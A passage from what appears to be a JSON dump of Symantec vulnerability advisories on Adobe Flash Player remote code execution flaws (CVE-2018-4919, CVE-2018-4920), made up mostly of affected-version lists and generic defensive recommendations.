11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 28.0.0.161 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2018-03-13T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4919 Use After Free Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-4919"], "modified": "2018-03-13T00:00:00", "id": "SMNTC-103385", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103385", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:46:01", "description": "### Description\n\nAdobe Flash Player is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.637 \n * Adobe Flash Player 11.2.202.643 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 18.0.0.382 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 22.0.0.209 \n * Adobe Flash Player 22.0.0.211 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 28.0.0.161 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2018-03-13T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4920 Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-4920"], "modified": "2018-03-13T00:00:00", "id": "SMNTC-103383", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103383", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:46:01", "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.137 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 